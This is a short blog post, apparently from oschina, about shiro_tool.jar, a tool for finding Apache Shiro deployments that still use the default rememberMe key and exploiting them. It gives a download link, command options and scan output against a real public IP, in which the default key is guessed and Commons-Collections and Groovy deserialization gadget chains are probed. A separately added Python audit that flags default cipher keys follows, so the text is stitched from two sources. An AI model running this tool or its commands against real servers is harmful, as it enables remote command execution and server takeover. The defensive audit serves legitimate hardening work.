- Detection tool
https://pan.baidu.com/s/1qCpm_E_Gw1VqSwkNyaWhEw (code: udwt)
- Detection commands
Check whether the target uses Shiro: java -cp shiro_tool.jar shiro.Check http://url
Run the full check: java -jar shiro_tool.jar https://xx.xx.xx.xx
nocheck --> skip checking whether the target is Shiro.
key= --> set a Shiro key.
req= --> request body file: capture the request, save it to a file, and give the file name here.
keys= --> keys file: a custom key file, one key per line.
(If the default key kPH+bIxk5D2deZiIxcaaaA== is still in use, an attacker can exploit the vulnerability to execute arbitrary commands remotely and compromise the server.)
java -jar shiro_tool.jar https://xx.xx.xx.xx
[-] target: http://47.110.35.164:8080
[-] target is use shiro
[-] start guess shiro key...
[-] use shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check CommonsBeanutils1
[-] check CommonsCollections1
[-] check CommonsCollections2
[-] check CommonsCollections3
[-] check CommonsCollections4
[-] check CommonsCollections5
[-] check CommonsCollections6
[-] check CommonsCollections7
[-] check CommonsCollections8
[-] check CommonsCollections9
[-] check CommonsCollections10
[-] check Groovy1
[-] check JSON1
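A defender-side companion to the default-key warning above, added here and not part of the original post or of shiro_tool: a small Python audit that scans Shiro configuration text for cipherKey settings and flags the default key quoted above, a key of the wrong AES length, or a custom key. The shiro.ini and Spring XML shapes it matches, and the sample config, are assumptions constructed for the example.

```python
import base64
import binascii
import re

# The default rememberMe cipher key quoted on this page. A deployment that still
# uses it is what the tool above finds when it reports "use shiro key: ...".
KNOWN_DEFAULT_KEYS = {"kPH+bIxk5D2deZiIxcaaaA=="}

# Assumed config shapes (not from the page):
#   shiro.ini:  securityManager.rememberMeManager.cipherKey = <base64>
#   Spring XML: <property name="cipherKey" value="...decode('<base64>')..."/>
INI_RE = re.compile(r"^\s*[\w.]*cipherKey\s*=\s*(\S+)", re.IGNORECASE)
XML_RE = re.compile(r'name="cipherKey"\s+value="([^"]*)"', re.IGNORECASE)
QUOTED_RE = re.compile(r"'([^']+)'")


def classify_key(key_b64: str) -> str:
    """Return 'default', 'invalid' or 'custom' for one base64-encoded cipher key."""
    if key_b64 in KNOWN_DEFAULT_KEYS:
        return "default"
    try:
        raw = base64.b64decode(key_b64, validate=True)
    except (binascii.Error, ValueError):
        return "invalid"
    # AES accepts 128/192/256-bit keys; any other length will not even load.
    return "custom" if len(raw) in (16, 24, 32) else "invalid"


def extract_keys(line: str) -> list:
    """Pull base64 key candidates out of one config line, or [] if none."""
    match = INI_RE.search(line) or XML_RE.search(line)
    if not match:
        return []
    value = match.group(1)
    # A Spring value may wrap the key in an expression such as decode('...').
    return QUOTED_RE.findall(value) or [value]


def audit_config(config_text: str) -> list:
    """Return (line_no, key, verdict) for every cipherKey found in the text."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), start=1):
        for key in extract_keys(line):
            findings.append((line_no, key, classify_key(key)))
    return findings


# Constructed sample: default key, a 16-byte custom key, and an 8-byte (invalid) key.
SAMPLE_CONFIG = """\
[main]
securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA==
<property name="cipherKey" value="#{T(org.apache.shiro.codec.Base64).decode('MDEyMzQ1Njc4OWFiY2RlZg==')}"/>
rememberMeManager.cipherKey = dG9vc2hvcnQ=
"""

if __name__ == "__main__":
    for line_no, key, verdict in audit_config(SAMPLE_CONFIG):
        print(f"line {line_no}: {key} -> {verdict}")
```

Any "default" verdict means the server's rememberMe cookie can be forged exactly as the scan output above demonstrates, so the key should be replaced with a freshly generated random one.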
Source: oschina
Link: https://my.oschina.net/u/1179666/blog/4812363